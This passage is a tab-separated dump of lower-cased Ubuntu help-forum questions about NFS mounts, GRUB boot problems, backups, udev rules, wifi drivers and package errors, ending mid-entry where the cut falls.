377240	allowing access to hdd from nfs share	i am currently attempting to setup an nfs share of the home directory on my server to the home directory on my laptop . however , i have run into a bit of a problem with the external hard drive mounted on the server . here is the problem : i have successfully setup and exported the nfs share to my laptop . i mounted the share on my laptop and attempted to access the directory on which i have mounted an external hard drive . my problem is that nothing on the external hard drive is showing up in the share . i can see the mount directory but not anything in the directory . the permissions on the directory are 777 so i do not see the problem being with a lack of permissions . i can see all of the other directories in the share just fine . it is only the directory with the hard drive that i can not see . i assume that this problem has to do with acl permissions . /etc/exports /nfs 192.168.1.81 ( rw , fsid=0 , insecure , no_subtree_check , no_root_squash , async ) /nfs/daniel 192.168.1.81 ( rw , nohide , insecure , no_subtree_check , no_root_squash , async ) my system is a linux mint 15 install so the equivalent of 13.04 .
377244	blinking cursor instead of booting	i 'm posting here as my last resort . i did an extensive google search with no results whatsoever . i have a laptop with phoenix bios aged 5-6 years old . i was running windows 7 and then 8.1 fine until recently when i tried to install xbmcbuntu ( ubuntu gets involved , wait ) . xbmcbuntu had its installation completed successfully . however , when i restarted the system instead of the os running or some error message , all i received was a blinking dos cursor in the upper left of a black screen . after some changes that i 'll describe below i decided to install ubuntu 13.10 with the same blinking cursor as a result . what i tried : rescatux 0.29 : install grub2 , update-grub2 rescatux 0.31b4 gets the same blinking cursor windows 7 and then 8 autofix from installation dvd ( when i still had them installed and dual boot ) windows 7 and then 8 commands ( fix mbr , etc ) bios related changes : sata = ahci dforom ( robson ) support = enabled/disabled legacy os boot = enabled/disabled reset configuration data = enabled/disabled i have tried to install xbmcbuntu from usb and cd , then ubuntu 13.10 from usb and dvd with the same results . at the moment , i have ubuntu installed in a clean partition table which i manually created ( i used the manual partition table only this time ) in the installation process of the dvd version . spec : 4 gb ram partition table : ext4 which is mounted as `` / '' swap area with size 4.5 gb edit1 : when i hold [ shift ] during startup , i manage to get `` grub loading . '' message and below it there is the blinking cursor . edit2 : after wiping the mbr using hiren 's cd , i saw that instead of the cursor blinking i was seeing some operating system not found error . also , using gparted instead of 298 gb my hdd appears as 320 gb . i 'm waiting for ubuntu to finish installation ... edit3 : exactly the same cursor blinking ... ... ...
377245	how to completely remove my emacs ?	i downloaded emacs source files , and installed it using make . after installing emacs successfully , i manually removed the downloaded source files to save disk space . now i want to remove emacs and i tried to use sudo apt-get purge emacs . but it says emacs has not been installed and will not be removed . but i can run emacs by typing emacs in the terminal . also the command which emacs shows the result /usr/local/bin/emacs . why ca n't apt-get detect it ? how can i remove emacs completely in this situation ? my os is ubuntu 12.04 , and my emacs version is 24.3.1 .
377246	how do i install hexen2/hammer of thyrion ?	i have downloaded this file and ca n't open it . i have n't much experience in linux but i tried several programs ; software-center , synaptic , archive manager , and gedit which was set as default and none of the will open it . the file i 'm trying to install is hexen2-installer-1.5.6-linux.run , which is available for download from here under linux-installer . any help will be greatly appreciated .
377247	backup failing with no space left error	so i have a backup partition set aside on my 100gb hdd ( old computer ) of about 30 gb . i have some files that i want both windows and ubuntu to access ( a ntfs partition ) as well as the backup directory for ubuntu . however , when it goes to automatically backup it says that there is no space left . i have my backup settings set to this : and it says that old backups will be kept until backup location is low on space . why is n't it deleting old backups if it does n't have enough space ? is it too low in the backup directory ( again , delete old backups ) or is it a problem with my /tmp or ~/.cache ? i looked at this question : why does déjà dup say there is no space left ? , but that did n't help any . afaik my tmp folder and my .cache folder are n't too large : edit : ( 11/18/2013 ) added results from command ( duplicity remove-all-but-n-full 1 file : ///media/nate/backup/backup -- force ) : synchronizing remote metadata to local cache ... copying duplicity-full-signatures.20130901t193629z.sigtar.gz to local cache . copying duplicity-full.20130901t193629z.manifest to local cache . copying duplicity-inc.20130901t193629z.to.20130905t184555z.manifest to local cache . copying duplicity-inc.20130905t184555z.to.20130912t120237z.manifest to local cache . copying duplicity-inc.20130912t120237z.to.20130919t173913z.manifest to local cache . copying duplicity-inc.20130919t173913z.to.20130926t110023z.manifest to local cache . copying duplicity-inc.20130926t110023z.to.20131003t111040z.manifest to local cache . copying duplicity-inc.20131003t111040z.to.20131010t112231z.manifest to local cache . copying duplicity-inc.20131010t112231z.to.20131019t172556z.manifest to local cache . copying duplicity-inc.20131019t172556z.to.20131024t120102z.manifest to local cache . copying duplicity-new-signatures.20130901t193629z.to.20130905t184555z.sigtar.gz to local cache . copying duplicity-new-signatures.20130905t184555z.to.20130912t120237z.sigtar.gz to local cache . copying duplicity-new-signatures.20130912t120237z.to.20130919t173913z.sigtar.gz to local cache . copying duplicity-new-signatures.20130919t173913z.to.20130926t110023z.sigtar.gz to local cache . copying duplicity-new-signatures.20130926t110023z.to.20131003t111040z.sigtar.gz to local cache . copying duplicity-new-signatures.20131003t111040z.to.20131010t112231z.sigtar.gz to local cache . copying duplicity-new-signatures.20131010t112231z.to.20131019t172556z.sigtar.gz to local cache . copying duplicity-new-signatures.20131019t172556z.to.20131024t120102z.sigtar.gz to local cache . last full backup date : sun sep 1 15:36:29 2013 no old backup sets found , nothing deleted . edit : ( 11/19/2013 ) ran duplicity cleanup file : ///media/nate/backup/backup -- force local and remote metadata are synchronized , no sync needed . last full backup date : sun sep 1 15:36:29 2013 gnupg passphrase : no extraneous files found , nothing deleted in cleanup .
377250	dash has stopped responding	i am running ubuntu 12.04lts 64bit and just recently dash has stopped responding . it still exists as an icon in the launcher but it will not open . the super key will not open dash either.does anyone have any suggestions to fix this problem . i have recently tried re-installing untiy but that hasnt seemed to help but as im new to linux i may have incorrectly followed through in terminal . cheers , new linux convert
377252	restore backup of winefi or uefi ( not sure ) that boot-repair made	i have a laptop that supports efi/uefi . i have windows 8.1 and ubuntu 12.04 on it . the way i installed my oses was like this : i installed win 8.1 in the required partitions then installed ubuntu and installed the boot loader in the same partition that i installed ubuntu . the previous time i did so , i used boot-repair to fix my grub so it would show both windows and ubuntu oses and it worked . that way windows were intact and in the case that ubuntu screw up ( upgrades ) or i screw up ( messing with it ) i would n't have to install windows all over again . this time tho , boot-repair showed me a message like the following one : winefi or winuefi ( i 'm not sure which one ) detected , do you want to backup and rename the files and like a noob that i am , i clicked yes . now grub replaced both boot loaders , and no matter which efi entry i select from bios , i get the same grub screen . that did n't happen before , if i had ubuntu efi as primary boot entry i was getting grub and was able to select linux or windows . if i had win 8 boot entry as the primary one . i was getting pure windows . and finally ( i know ) the question ... boot-repair said that it backed up winefi loader or whatever . does anyone know how i can restore it ? thanks in advance .
377253	unable to format usb drive with disks ( udisks-error-quark , 0 )	upon trying to make a startup disk ( usb ) for ubuntu 12.04 , the system prevented boot loader installation . i 'm getting message : error synchronizing after initial wipe : timed out waiting for object ( udisks-error-quark , 0 ) can i still use the startup disk ?
377255	where is ubuntu source code ?	how do i get the source code of the operating system ? how do i run the modified code ? what programming languages ​​are used to modify the code ?
377257	ca n't boot an intel equipped laptop from the burned iso for 13.10 isp ( x386 )	keep getting an error message that `` this kernel requires the following features not present on this cpu : pae '' . i 'm running an intel pentium m 2.0 ghz , with 2 gb of ram on a 60 gb hard drive . this is a dell latitude d600 . i burned the ubuntu-13.10-desktop iso on a dvd with the native windows 7 disc image burner . any info on this issue ? assumed it would run as i 've more that met the system requirements with this machine .
377258	usb mount autorun a script using udev	i 've spent a lot more time than i was expecting and was hoping i could get some help debugging . my goal is to sync files between my documents and my usb drive as soon as it is mounted . i 've consulted a lot of posts on this , but these two have been the most beneficial . autorun a script after i plugged or unplugged a usb device how to run a script when a specific flash-drive is mounted ? my scripts work . i have executed them by hand , and they create log files which tell me they are running and performing the files i tell them to . what i do n't know if the rules from udev are executing the run command . here 's all the stuff . typing usb reveals the following of the device of interest : bus 003 device 015 : id 0930:6545 toshiba corp. kingston datatraveler 102 flash drive / hema flash drive 2 gb / pny attache 4gb stick file : /etc/udev/rules.d/00-usb-kingston.rules attrs { idvendor } == '' 0930 '' , attrs { idproduct } == '' 6545 '' action== '' add '' , run+= '' sh /home/holiestcow/.bin/usb-kingston-in_dev '' typing udevadm rules /etc gives me the following : parse_file : reading '/etc/udev/rules.d/00-usb-kingston.rules ' as rules file file : /home/holiestcow/.bin/usb-kingston-in_udev # ! /bin/bash echo `` in_udev '' > progress.txt /home/holiestcow/.bin/usb-kingston-in & file : /home/holiestcow/.bin/usb # ! /bin/bash sleep 1 display= '' :0.0 '' home=/home/holiestcow/ xauthority= $ home/.xauthority export display xauthority home echo `` kingston-in part dos '' > > progress.txt rsync -auv -- delete -n /media/carlo\ gen/ /home/holiestcow/documents/ > > progress.txt rsync -auv -- delete -n /home/holiestcow/documents/ /media/carlo\ gen/ > > progress.txt future thanks for your help .
377259	stop terminal auto executing when pasting a command	right , this is a slightly annoying feature because something this happens , and other times it does n't , very odd . i paste a command into the terminal with a view to tweaking its arguments , and sometimes it executes the second i paste it . sometimes it does n't . this ranges from embarrassing ( posting nonsensical comments on an irc ) to dangerous . how can i shut this feature off for good ? i never , never , never want the terminal to auto execute when i paste to it .
377260	ca n't install ubuntu one after upgrade	i installed 10.04 today and immediately upgraded to 12.04 ( long story ) . tried to install ubuntu one and got this warning : quote w : failed to fetch cdrom : //ubuntu 10.04.4lts_lucid lynx_-release i386 ( 20120214.2 ) /dists/lucidmain/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt.apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 10.04.4lts_lucid lynx_-release i386 ( 201214.2 ) /dists/lucid/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . unquote i do n't have a clue what this means nor do i know what to do . any help available ?
377264	assistance in setting up an ubuntu business box server	i 'm a newbie when it comes to ubuntu server setup . i 'm currently setting up a server to run across works current network . i found the below guide to setting it up and following it to the letter . http : //www.thefanclub.co.za/how-to/how-setup-ubuntu-business-box-server-ubb-part-1 i get to 'step 6 ' where it says reboot and check the internet connection . when i reboot there is no network connection and hence , no internet . a couple of questions . first off , is this a decent guide to go by in your expert opinion ? it seemed pretty comprehensive so i thought it was worth following . do you know what could be going wrong with this setup ? after each step i decided to reboot the system to try and identify where the network was disconnecting . it looks to be in the step 3 , `` set hostname ( fqdn ) after i enter the details into the 'hostname ' file . the modem is set to the correct ip . i ca n't access the network manager anymore as it was uninstalled . unfortunately it looks like i ca n't just reinstall it without a network connection . thank you in advance .
377265	troubles with gimp resynthesizer	gimp version : 2.8.8 operating system : linux list any error messages you received : ubuntu internal error : plugin-heal-selection.py crashed with error in heal_selection ( ) : procedure not found . error occurred when running python_fu_heal_selection error : procedure not found traceback ( most recent call last ) : file `` /usr/lib/gimp/2.0/python/gimpfu.py '' , line 699 , in response dialog.res = run_script ( params ) file `` /usr/lib/gimp/2.0/python/gimpfu.py '' , line 361 , in run_script return apply ( function , params ) file `` /usr/lib/gimp/2.0/plug-ins/plugin-heal-selection.py '' , line 148 , in heal_selection pdb.plug_in_resynthesizer ( timg , tdrawable , 0,0 , useborder , work_drawable.id , -1 , -1 , 0.0 , 0.117 , 16 , 500 ) error : procedure not found the procedure âťplug-in-resynthesizerâť is not found plug-in 'resynthesizer ' left image undo in inconsistent state , closing open undo groups . i have ubuntu 13.04 raring ringtail to 64 bits , everything was working fine with gimp 2.86 to 64 bits and resynthesizer , i installed both ( i have installed gimp-plugin-registry from otto-kesselgulasch/gimp ppa ) and another plugins long mounths ago from the ppa : otto-kesselgulasch/gimp , all work pretty good in the past with gimp 2.86 , but arrives the upgrade 2.88 three days ago i upgrade with it without problems , but to the next day when i want use resynthesizer appears me the past error messanges of gimp and ubuntu that i wrote at the beginning here . i got install resynthesizer now but appears me yet the same error messages . yesterday i uninstalled resynthesizer with sinaptic completly and reinstalled with the comand sudo apt-get install gimp-resynthesizer but the problem continue how i can fix it ? thank you
377267	move two levels higher over scp	i am scping into a virtual server and need to copy some files into the /var/www/ directory so apache2 can serve 'em up . however , by default , the files that i upload go into the users dirctory . i need to get them two levels up . how would i do this over scp ?
377268	grub4dos appears when booting in ubuntu	so i followed this guide on how to get ubuntu to dual boot with win 7 : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ the install went swell , and i made sure that ubuntu installed the boot loader in dev/sda5 ( the /boot ) . i boot back into windows as i fully expect windows not to recognize ubuntu yet . i open up easybcd ( like the tutorial ) , select all the options ( grub2 ) , select the boot partition i made before , wrote everything to the mbr and restarted . great , saw both win7 and ubuntu listed there . i select ubuntu and am greeted with grub4dos . so , did i do something wrong or did easybcd screw something up . the only reason i decided against grub2 as the primary bootloader was due to the fact that i read somewhere that windows will mess with the mbr when it updates and i did n't want to deal with fixing everything on every update . if this is false , is there an easy way going about getting grub2 back ? i have a live cd ( usb ) so i am familiar with the concept .
377270	no network after installing ubuntu 13.10	after testing from a dvd on an old dell inspiron laptop connected by ethernet , i decided to install . now , i can not get network anymore and the wireless does not work since this is one of the broadcom card that will need the drivers updated when i can get a network connection back . not sure what 's going on since it was working fine off the dvd . the ouput of lspci -nn & & lsusb is : 00:00.0 `` 0600 '' `` 8086 '' `` 27a0 '' -r03 `` 1028 '' `` 01bd '' 00:01.0 `` 0604 '' `` 8086 '' `` 27a1 '' -r03 `` '' `` '' 00:1b.0 `` 0403 '' `` 8086 '' `` 27d8 '' -r01 `` 1028 '' `` 01bd '' 00:1c.0 `` 0604 '' `` 8086 '' `` 27d0 '' -r01 `` '' `` '' 00:1c.3 `` 0604 '' `` 8086 '' `` 27d6 '' -r01 `` '' `` '' 00:1d.0 `` 0c03 '' `` 8086 '' `` 27c8 '' -r01 `` 1028 '' `` 01bd '' 00:1d.1 `` 0c03 '' `` 8086 '' `` 27c9 '' -r01 `` 1028 '' `` 01bd '' 00:1d.2 `` 0c03 '' `` 8086 '' `` 27ca '' -r01 `` 1028 '' `` 01bd '' 00:1d.3 `` 0c03 '' `` 8086 '' `` 27cb '' -r01 `` 1028 '' `` 01bd '' 00:1d.7 `` 0c03 '' `` 8086 '' `` 27cc '' -r01 -p20 `` 1028 '' `` 01bd '' 00:1e.0 `` 0604 '' `` 8086 '' `` 2448 '' -re1 -p01 `` '' `` '' 00:1f.0 `` 0601 '' `` 8086 '' `` 27b9 '' -r01 `` 1028 '' `` 01bd '' 00:1f.2 `` 0101 '' `` 8086 '' `` 27c4 '' -r01 -p80 `` 1028 '' `` 01bd '' 00:1f.3 `` 0c05 '' `` 8086 '' `` 27da '' -r01 `` 1028 '' `` 01bd '' 01:00.0 `` 0300 '' `` 1002 '' `` 7145 '' `` 1028 '' `` 2003 '' 03:00.0 `` 0200 '' `` 14e4 '' `` 170c '' -r02 `` 1028 '' `` 01af '' 03:01.0 `` 0c00 '' `` 1180 '' `` 0832 '' -p10 `` 1028 '' `` 01bd '' 03:01.1 `` 0805 '' `` 1180 '' `` 0822 '' -r19 -p01 `` 1028 '' `` 01bd '' 03:01.2 `` 0880 '' `` 1180 '' `` 0592 '' -r0a `` 1028 '' `` 01bd '' 03:01.3 `` 0880 '' `` 1180 '' `` 0852 '' -r05 `` 1028 '' `` 01bd '' 0b:00.0 `` 0280 '' `` 14e4 '' `` 4311 '' -r01 `` 1028 '' `` 0007 '' bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub got it to work by following `` no network devices available '' after fresh install of 13.04 sudo apt-get remove -- purge bcmwl-kernel-source reboot reinstalling bcmwl-kernel-source from the dvd $ sudo apt-get install firmware-b43-installer $ sudo apt-get remove bcmwl-kernel-source reboot again everything is fine from there on
377271	how can i undo this command ?	how can i undo the following command : chmod -r a+rwx / ? i used it to modify some permissions , but it did not do as i had expected .
377274	mount -a works , but boot hangs on mount	i have a 3 tb internal hdd ( /dev/sdc ) which i have formatted as ntfs and which is automatically loaded from this /etc/fstab file ( note , this is an ubuntu 13.10 os , not a raspberry pi ) : uuid=3efd666c-495d-4e95-8094-b1157f5499f3 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation # uuid=e167c5b7-af0d-4fd5-84de-4c8d86b0303d none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # media drive /dev/sdc1 /home/raspi/documents/raspi/raspi/media ntfs rw , suid , dev , auto , exec , nouser , async , uid=1000 , gid=1000 , dmask=027 , fmask=137 0 2 with that last line included , the computer hangs when booting , then tells me that the problem is with mounting of /home/raspi/documents/raspi/raspi/media and that i have to press s to skip , at which point ubuntu boots up properly . once inside , if i issue the command sudo mount -a , sdc1 gets mounted correctly . does this problem of not being able to mount at boot have something to do with the uid=1000 , gid=1000 , dmask=027 , fmask=137 options ?
377276	pptpd can connect but websites do not work	so i have successfully created and setup a pptpd server and i can not access any websites , this does not seem to be a common problem because google has failed to find me an answer .
377278	can not mount usb pendrives in 13.10	i just upgrade to 13.10 , and it does n't mount any of my pendrives that was automatically mounted in 13.04 . did any one have this problem , or have any idea on how can i make 13.10 mount the pendrives ? once i ca n't connect anything on the usb , and i 'm also having problems with the wifi , i took pictures of some important outputs , requested by experienced users . and , once i do n't have enough reputation to post it here , they are in this link to a folder in my drive :
377280	problem when installing canon pixma ip2770 driver	in my ubuntu 13.10 system , i tried to install canon pixma ip2770 with the following command : sudo add-apt-repository ppa : michael-gruz/canon sudo apt-get update sudo apt-get install cnijfilter-ip2700series then i get the following error messages like this : cnijfilter-common : i386 : depends : libpopt0 : i386 ( > = 1.7 ) but it is not going to be installed cnijfilter-ip2700series : i386 : depends : libatk1.0-0 : i386 ( > = 1.9.0 ) but it is not going to be installed depends : libcairo2 : i386 ( > = 1.0.2-2 ) but it is not going to be installed depends : libgtk2.0-0 : i386 ( > = 2.8.0 ) but it is not going to be installed depends : libpango1.0-0 : i386 ( > = 1.12.3 ) but it is not going to be installed depends : libpopt0 : i386 ( > = 1.7 ) but it is not going to be installed depends : libtiff4 : i386 but it is not going to be installed can someone help to solve this problem ?
377282	13.10 does n't connect wifi	i know many people are having this problema , but any of the solutions seems to work . my wifi was working perfectly with 13.04 , but when i updated to 13.10 it just seems that my laptop does n't have a wifi . as requested by experienced users in other posts , this is the output of lspci ubuntu @ ubuntu : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] wrestler [ radeon hd 6310 ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] wrestler hdmi audio 00:07.0 pci bridge : advanced micro devices , inc. [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 1 ) 00:15.2 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 2 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 7 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 07:00.1 bluetooth : ralink corp. rt3290 bluetooth 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) ubuntu @ ubuntu : ~ $
377284	ubuntu 12.10 startup issues	i installed ubuntu on a laptop and then when i went to restart i got an error message to put the windows disc in . i have a usb stick with the program on it as well and it asks me if i want to use windows or ubuntu on startup . but is n't working ? using windows 8
377286	my m-audio fast track c400 sound card only has 4.0 or 5.0 output , i need headphone 2.0 output	there is no choice of 2.0 output in the sound setting . in alsamixer , there is no headphone mode . but pcm1-out1 , pcm1-out2 ... .to pcm5-out5 ... actually all the jacks of my sound card have sound . how can i just use the monitor headphone jack ?
377291	do-release-upgrade all websites down help !	hi when i upgrade my system using do-release-upgrade i think my apache configuration is being reset , all my sites are giving the message it works . currently my sites are in var/virtualwww/ folder i guess when the apache is resetted its pointing to var/www/ how can i fix this ? please advice thanks in advance
377292	408 error in browser using google or openid on some networks in ubuntu	i have searched here and the web and many other people have similar issues going back a few years ( my google account not working properly with ubuntu for example ) , but no one seems to have fixed it . i get the same results in chrome , firefox and epiphany browsers . have done complete removal 's and re-installs of them all and ubuntu . i originally had this problem in mint , but re-installed ubuntu , same problem i have this problem on 3 ubuntu machines , 2 on 13.10 ( fresh installs , not upgrades ) and one on 11.10 , the 11.10 dualboots windows 7 and that is what i am using now . only in windows can i log on to any openid site , and only on windows can i use all google services with out problems . dropbox client in ubuntu can not connect , windows can . so openid and google search results time out , in firefox i get the 408 error , in chrome the oops message . but i can log into gmail without problems in both browsers . with all of them the problem started with a change of service from my isp ( worldnet.co.nz when i moved from adsl to fiber optic or ufb ) . speed tests using speedtest.net produce similar download speed , but the ubuntu machines are unable to do the upload tests , it just sits on 0.00 for as long as i can wait . one of the machines is a laptop and it works fine when i take it else where and use other networks . so this would appear to be a network issue , but after 2 weeks my isp can find nothing wrong , and have completely removed any firewall protection from my connection . my main desktop is in the dmz zone for my router , i have a static ip address , and no fire wall running on it at present . windows 7 works correctly which suggests my isp is correct when they say it 's not a problem at their end . my router does not support ipv6 and i have disabled ipv6 in one of the machines , no change . ubuntu updates work fine , i have no problems with apt-get . i can browse all generic web sites like www.nzherald.co.nz or askubuntu , but i ca n't log into some sites . i have tried changing dns servers , no difference , and nslookup and dig return the expected results always . traceroute works fine . can any one help here ? i have installed dnsmasq . unistalled it , tried static ip , dhcp ( my router is assigned static ip by my isp which changed with the new fiber connection ) . tried google dns , my isp dns manually added , auto assigned dns . ifconfig reports a virbr0 interface on 192.168.122.1 , the rest of the machines on my router are on 192.168.0 . * and i do not know where this virbr0 comes from . gnome boxes maybe ? all machines on the router can see each-other in files folders . so to recap , a fresh wipe all data re-install does not fix it , booting of the ubuntu 13.10 live usb shows the same problems . windows has no problems . please help me , as bizarrely this seems to be a problem with ubuntu only . thanks ,
377293	cmake unable to find boost library ?	i have already installed boost in my brand new ubuntu 12.04 machine . and when i do like this : cmake . i always get the below exception saying : could not find boost i am not sure what wrong i am doing here . i have one of my ubuntu instances working fine , and i am trying the same thing on my new ubuntu instance which i have got . so i am not sure what i am doing wrong here , and how the same thing works fine in my other ubuntu instance . root @ dbx1245 : /export/home/test/libcql # cmake . -- could not find boost want_lib64 unset ; assuming normal library directory names will install libraries to /usr/local/lib -- configuring done -- generating done -- build files have been written to : /export/home/test/libcql can anyone help me with this ? i am running ubuntu 12.04 . i have seen other article as well on stackoverflow , but i am not able to solve this issue . i already have boost installed by the way .
377294	how to cc & make an opencl program on my laptop asus x550cc	my system is ubuntu 12.04.3 lts 64bit . my laptop is a asus x550cc with intel integrated graphics & nvidia 720m . i installed cuda5.0 , and when i run optirun ./devicequery , it work good . but when write a opencl program without cuda . ( just an opencl program ) the function clgetplatformids return a error . ret is -1001 . can anyone give me an answer . tell me why , and how to cc & make & run an opencl program . ( not cuda ) ? ( the program is a sample from fixstars 's opencl textbook . ) i followed the normal instructions for installing cuda as described here . how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ?
377296	can i install ubuntu on a samsung wave 2 s8530 phone that is running bada os ?	i 'm using bada os version 1.2 on my samsung wave 2 s8530 . my phone 's hardware is : ⠀• 1ghz processor ⠀• 512mb ram ⠀• 2gb internal memory ⠀• hummingbird chipset ⠀• 73mb gpu memory i have a 32gb uhs 1 class 10 microsd card . please tell me can i install ubuntu on my phone ?
377300	where do you find the source code of keyboard shortcut application ?	where do you find the source code of application that allows you to customize the keyboard shortcut that is built into ubuntu ? the application that i am talking about is shown in the image below .
377307	how to install resynthesizer in gimp ?	i dont know how to install resynthesizer in gimp.i want resynthesizer for editing my images.anyone please help
377310	cod4 on wine problem	i install cod4 on ubuntu 13.10 and everything is ok but when i connect to server cod4 just freez and send me an error iw3mp.exe has stoped working . any halp pls and thank you i google it and win users tell that is because one of this is problem - uninstalled audio driver and let windows reinstall driver . - installed newest realtek driver . - changed file name in mile . - plugged in mic . - enabled steriomix . and i realz dont know how to fix it . i postet to wine but no one replaz to me so i ask here
377312	remove kernel not created using .deb file	i by mistake installed kernel in ubuntu 11.04 using `` make '' command and did n't created proper `` .deb '' file . now i want to remove that image of kernel and since i did n't created using .deb file , i do n't see the header file in synaptic or ubuntu-tweak , but it is there in grub and /boot folder . please tell me what is the best way i can remove kernel which i installed using make command ? thanks
377319	issues with ubuntu 12.10 64-bit on hp probook 4530s notebook pc	i installed ubuntu 12.10 64-bit on hp probook 4530s notebook pc ( 64-bit , intel® core™ i3-2310m cpu @ 2.10ghz × 4 ) , but wifi does n't work , video driver does n't detect and processor is overheating . does anyone have experience with the solutions ? can anyone help to resolve the problems ? i created some gists about my system . thanks uname -a = > linux ub 3.5.0-42-generic # 65-ubuntu smp tue oct 1 23:38:22 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci -vv dmesg
377320	libx11-dev has no installation candidate	i am trying to install libx11-dev , by : sudo apt-get install libx11-dev then got the following error ; reading package lists ... done building dependency tree reading state information ... done package libx11-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libx11-dev ' has no installation candidate i have no idea how to deal it , what should i do ?
377322	how to successfully run a tascam ( pref us122 ) on lubuntu using an armboard ( pref cubieboard2 ) ?	has anyone been successful with running usx2yloader specifically ? i can do every step needed to run my tascam ( usb audio interface ) except run the command usx2yloader to start the device . on an armboard , preferably cubieboard2 or anything using armhf ! i386 does not apply ! =d before asking too many questions about the process of my installation , which has been long and annoying . check this similar question , more in depth . i am mainly looking for people who have successfully installed , usx2yloader ( or alsafirmware alsa-tools ) and had the command saved to /usr/bin/usx2yloader ( or /sbin ) , even if the tascam didnt load ! ( there is a common issue ) .
377328	how to change login screen picture in ubuntu 12.04	i have tweaked with ubuntu to make it look like a mac . i have done this before and the login screen was the same as a mac , but i am still getting the desktop pic as my login pic when in ubuntu tweak it is set to the mac login screen pic . i go back to the login settings and remove them add the pic for the login screen , but it still shows my desktop pic . can you guys help me ? thanks
377329	failed to uninstall postgres-xc	while trying to set up my rails environment to use postgresql i mistakenly installed postgres-xc . however an error occurred in installation , so when i tried to remove the package i get the following error : the following packages will be removed : postgres-xc 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 17.2 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 269015 files and directories currently installed . ) removing postgres-xc ... dpkg ( subprocess ) : unable to execute installed pre-removal script ( /var/lib/dpkg/info/postgres-xc.prerm ) : no such file or directory dpkg : error processing postgres-xc ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 * starting postgres-xc datanode pg_ctl : another server might be running ; trying to start server anyway pg_ctl : another server might be running ; trying to start server anyway [ ok ] * starting postgres-xc coordinator pg_ctl : another server might be running ; trying to start server anyway [ ok ] * starting postgres-xc gtm gtm_ctl : another server might be running ; trying to start server anyway gtm_ctl : could not start server examine the log output . invoke-rc.d : initscript postgres-xc , action `` start '' failed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : postgres-xc e : sub-process /usr/bin/dpkg returned an error code ( 1 ) googling shows some solutions point to editing the /var/lib/dpkg/info/postgres-xc.prerm file to include exit 0 but that does n't work . also , notice that its not even recognizing that file .
377333	mount.nfs : access denied by server while mounting	i have a problem i have been googling for at least 6 hours 28 hours with no luck . whenever i try to mount a directory i get the following error ( verbose version at end ) : mount.nfs : access denied by server while mounting : initally i was using computer1 as the nfs server , but i have moved it over to computer2 and i am trying to mount on computers3-8 . as a further note , computer2 is now acting as the dhcp router for all other computers ( even computer1 ) , but i am almost certain that the problem has to do with computer2 's nfs settings as i have tried the following : try mounting a folder from the original computer1 server to one of the computers3-8 clients -- success try mounting a folder from the original computer1 server to the new computer2 server -- success try mounting a folder from the new computer2 server to one of the computers3-8 clients -- failure try mounting a folder from the new computer2 server to the old computer1 server -- failure try exporting then mounting any other folder on computer2 -- failure ssh to and from computer2 -- success in addition to this , i have also checked to make sure that the relevant parts of the /etc/exports file do not have any mistakes . therefore , i am almost absolutely certain this is not a permission issue . question : given that this is not a network error , can anyone advise me as to how i can start debugging this problem . verbose output : mount : proc already mounted on /proc mount : 